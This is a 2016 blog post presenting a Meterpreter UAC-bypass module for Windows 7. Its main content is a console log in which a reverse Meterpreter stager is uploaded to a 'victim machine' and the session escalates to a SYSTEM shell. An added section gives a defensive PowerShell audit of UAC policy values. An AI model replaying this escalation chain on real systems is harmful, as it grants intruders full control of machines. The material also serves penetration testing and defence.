
Thursday, November 10, 2016

Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module

Here is a nice new addition for bypassing UAC through Meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson on bypassing Windows UAC. This method takes advantage of process injection into a process that has a trusted Windows Publisher Certificate (for example, explorer.exe, which runs at medium integrity). It is fully functional on both x86 and x64 platforms. Source code is in the zip along with the Meterpreter plugin.

Bypassing Windows 7 UAC Restrictions on a fully... by nu11secur1ty

 [*] Sending stage (749056 bytes) to  
 [*] Meterpreter session 1 opened ( -> at Fri Dec 31 20:43:24 -0500 2010  
 msf exploit(handler) > sessions -i 1  
 [*] Starting interaction with 1…  
 meterpreter > getsystem  
 [-] priv_elevate_getsystem: Operation failed: Access is denied.  
 meterpreter > run bypassuac  
 [*] Creating a reverse meterpreter stager: LHOST= LPORT=4546  
 [*] Running payload handler  
 [*] Uploading Windows UACBypass to victim machine.  
 [*] Bypassing UAC Restrictions on the system….  
 [*] Meterpreter stager executable 73802 bytes long  
 [*] Uploaded the agent to the filesystem….  
 [*] Executing the agent with endpoint with UACBypass in effect…  
 meterpreter > [*] Meterpreter session 2 opened ( -> at Fri Dec 31 20:43:40 -0500 2010  
 meterpreter >  
 Background session 1? [y/N]  
 msf exploit(handler) > sessions -i 2  
 [*] Starting interaction with 2…  
 meterpreter > getsystem  
 …got system (via technique 1).  
 meterpreter > shell  
 Process 416 created.  
 Channel 1 created.  
 Microsoft Windows [Version 6.1.7600]  
 Copyright (c) 2009 Microsoft Corporation. All rights reserved.  
 nt authority\system  
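
A defender-side check related to the method described above, added here as an example (not code from the original post or from the module's authors): the method leans on the trust Windows gives to its own signed components, and at the default UAC level (`ConsentPromptBehaviorAdmin` = 5) Windows asks for consent only for non-Windows binaries. The function name `Get-UacAssessment`, the output property names and the sample values are assumptions made for illustration; the registry key and value names are the standard UAC policy settings.

```powershell
# Added example: audit the UAC policy values that decide whether
# Windows-signed components can elevate without a consent prompt.
function Get-UacAssessment {
    param(
        # Optional hashtable of policy values; omitted = read the live registry.
        [hashtable]$Policy
    )
    if (-not $PSBoundParameters.ContainsKey('Policy')) {
        $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
        $p = Get-ItemProperty -Path $key
        $Policy = @{
            EnableLUA                  = $p.EnableLUA
            ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
            PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        }
    }
    # Assumption: a value that is not set is treated as its documented default.
    $lua    = if ($null -ne $Policy.EnableLUA) { $Policy.EnableLUA } else { 1 }
    $admin  = if ($null -ne $Policy.ConsentPromptBehaviorAdmin) { $Policy.ConsentPromptBehaviorAdmin } else { 5 }
    $secure = if ($null -ne $Policy.PromptOnSecureDesktop) { $Policy.PromptOnSecureDesktop } else { 1 }

    $findings = @()
    if ($lua -eq 0) {
        $findings += 'EnableLUA=0: UAC is off, administrators always run elevated.'
    }
    switch ($admin) {
        0 { $findings += 'ConsentPromptBehaviorAdmin=0: elevation without prompting.' }
        5 { $findings += 'ConsentPromptBehaviorAdmin=5: consent is requested only for non-Windows binaries.' }
    }
    # Values 1 and 2 always prompt on the secure desktop, whatever this flag says.
    if ($secure -eq 0 -and $admin -notin 1, 2) {
        $findings += 'PromptOnSecureDesktop=0: prompts appear on the interactive desktop.'
    }
    [pscustomobject]@{
        SilentElevationPossible = ($lua -eq 0 -or $admin -in 0, 5)
        Hardened                = ($findings.Count -eq 0)
        Findings                = $findings
    }
}

# Constructed sample: Windows 7 out-of-box values (default slider position).
Get-UacAssessment -Policy @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 5; PromptOnSecureDesktop = 1 }

# Constructed sample: consent prompt on the secure desktop for every elevation.
Get-UacAssessment -Policy @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 2; PromptOnSecureDesktop = 1 }
```

Calling `Get-UacAssessment` with no arguments reads the policy from the local registry instead of the constructed samples.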
